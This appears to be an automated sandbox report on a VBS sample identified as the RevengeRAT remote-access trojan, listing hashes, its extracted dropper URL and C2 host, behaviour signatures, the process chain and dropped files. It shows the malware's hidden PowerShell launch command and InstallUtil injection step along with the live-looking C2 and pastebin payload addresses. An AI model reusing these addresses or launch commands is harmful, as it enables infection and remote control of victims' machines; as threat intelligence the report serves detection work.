Analysis

  • max time kernel
    174s
  • max time network
    175s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    19-02-2022 09:01

General

  • Target

    99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs

  • Size

    135KB

  • MD5

    ee2fb6446ec3ac180286e25365b202b3

  • SHA1

    6bd0bf5b4d0cea86979de7d5b78937c2ff4ee778

  • SHA256

    99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee

  • SHA512

    8e33769206cb7cb5a2655cdc18fba9087bdbfff0de4637d85d5837b36c529ddfb1b69c7424c7d18e38cb8ac106133c9cac2178abc50b8a119f7ae456bac2de27

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper: https://pastebin.com/raw/3mS4sRnV

Extracted

  • Family

    revengerat

  • Botnet

    Client

  • C2

    kimjoy.ddns.net:2021

  • Mutex

    RXQLV8XYTDNHNSA

Signatures

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 49 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3564
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1460
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB077.tmp" "c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\CSC7AA40A77B20242269F51E85EE1EE2F95.TMP"
            5⤵
              PID:3420
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            4⤵
              PID:1020
  • C:\Windows\system32\MusNotifyIcon.exe
    %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
    1⤵
    • Checks processor information in registry
    PID:3300
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -p
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    PID:2488
  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:1340

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Discovery

    Query Registry (2) T1012
    System Information Discovery (3) T1082

  • Command and Control

    Web Service (1) T1102


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    MD5: c163ab439d3c5ab9abff81272c463c19
    SHA1: 3f87e709ce5e2b8a4eed5dd1c9f4252549b0b94f
    SHA256: 4dbf858a84ae2a2ff8368e49a188c61d41606da2ce8aece245f70f787029ff5a
    SHA512: 473f1ee75bcd06a2f53b3b4605a4805c9b1fca5b3b87080d9708308a426cb4b8e81543a982f9c94d2fb5a1101f264e0533663cb471035e83e1abf4126d91ec79

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    MD5: 9623954de06799ed53f9f40a5a74fc70
    SHA1: 72b5934105dcaf591b42c885b029a4a0256d8e7b
    SHA256: b9d649868bb3cd32ed1b052c7028dfa413cf50bd02e06dda401f89fd96e31a9c
    SHA512: 2087d1525ba56fc6c713ca18e9ca63b8838307aeadf24f67908697785072fe394d2472bfa0a5eb3d80e09645540befc9671f2723d5caef976dc0e268451ab21c

  • C:\Users\Admin\AppData\Local\Temp\RESB077.tmp

    MD5: 8b16177d13efdcfdbd771711e15ed1a8
    SHA1: 41232d1a185dcd5cba8e66621c20d6fa8a41e046
    SHA256: a1e16dcbbae38c1cb6666cabc0f4833cddd495fac43d2d7665243bcc83bb0e55
    SHA512: a35631e33dafa0d2a296591e7e1c0d22252561b4d676b1a55a8dee60ae71361684c5b58009042e591cc1b6864481557243c794bafa33ddf2685d19610ec12028

  • C:\Users\Admin\AppData\Local\Temp\SysTray.PS1

    MD5: 2bd198d265d67c9f4021eca5bb341900
    SHA1: e3559a0d69e988877ce69d66b69cb41619521272
    SHA256: 721e44289afb034e90a67fb97eb5efd4d469bc95ba9863f16aed5e5909c76c61
    SHA512: fa00e4b59b41ccbe865d342815001262323db96f99ebd30b1a5728111f9959c2e2775a5f279652649505ad23afe7a5551a705c650b985829cd2690f92f50e8f4

  • C:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.dll

    MD5: f09a7c9a8eec8ac4a2295b88ca0ba7e0
    SHA1: 0ac6cce375bb53818a4ddba018fc0296de440043
    SHA256: 7239c1c4fb39c957bef18bc5375792cab6b4215cdb3696f5cda85f9b56568a12
    SHA512: 51764e8faeb83fbda73ff9833ee84aeb07eb4c688d5b2de2ea9f18491bb6954ccb2dd010c49783b63001ee19058fb3377bd6854eb87af707bf23e88541b6d3d7

  • \??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\CSC7AA40A77B20242269F51E85EE1EE2F95.TMP

    MD5: 4b63037af1071af8799e05c25b21ed30
    SHA1: 076792ad48918fa0991b19d7d7c385100fa96f02
    SHA256: e71506e10d76cd5f50b1d809a76fdef49ee4356bc982df4e6a915183d35ccb21
    SHA512: 029a815745d08acd040b478ca7e80afb3c65980d91248d0d02c2f4f9d8093a9a177feacdad64986bb0ece7c5aadbcc24611a31993ac8a792584e6745b0bb9044

  • \??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.0.cs

    MD5: e03b1e7ba7f1a53a7e10c0fd9049f437
    SHA1: 3bb851a42717eeb588eb7deadfcd04c571c15f41
    SHA256: 3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
    SHA512: a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

  • \??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.cmdline

    MD5: 1bd0a6414db5d09cf698f1a8ffe96489
    SHA1: bcedd72309b67ff35141c3d33e8df7356b466d1d
    SHA256: 50249e12d6a0c8c1b364110502f97903050896624b0aba6b6e6a8d26fe5eef0e
    SHA512: bac229a1d54e26c174779c8b261eb54134d2f30756a64b350644ea26bff522ff8e10029c5fed3784f747fc0d4f99951c016098b39a8046cd188c62d95d939650

  • memory/1020-164-0x0000000005590000-0x0000000005B34000-memory.dmp

    Filesize: 5.6MB

  • memory/1020-163-0x0000000074D9E000-0x0000000074D9F000-memory.dmp

    Filesize: 4KB

  • memory/1020-158-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize: 40KB

  • memory/1680-136-0x000002506A9B3000-0x000002506A9B5000-memory.dmp

    Filesize: 8KB

  • memory/1680-137-0x000002506ABC0000-0x000002506ABE2000-memory.dmp

    Filesize: 136KB

  • memory/1680-130-0x00007FFA6C363000-0x00007FFA6C365000-memory.dmp

    Filesize: 8KB

  • memory/1680-140-0x000002506A9B6000-0x000002506A9B8000-memory.dmp

    Filesize: 8KB

  • memory/1680-135-0x000002506A9B0000-0x000002506A9B2000-memory.dmp

    Filesize: 8KB

  • memory/3564-152-0x000001A7EC720000-0x000001A7EC796000-memory.dmp

    Filesize: 472KB

  • memory/3564-151-0x000001A7EC256000-0x000001A7EC258000-memory.dmp

    Filesize: 8KB

  • memory/3564-150-0x000001A7EC253000-0x000001A7EC255000-memory.dmp

    Filesize: 8KB

  • memory/3564-149-0x000001A7EC250000-0x000001A7EC252000-memory.dmp

    Filesize: 8KB

  • memory/3564-148-0x00007FFA6C363000-0x00007FFA6C365000-memory.dmp

    Filesize: 8KB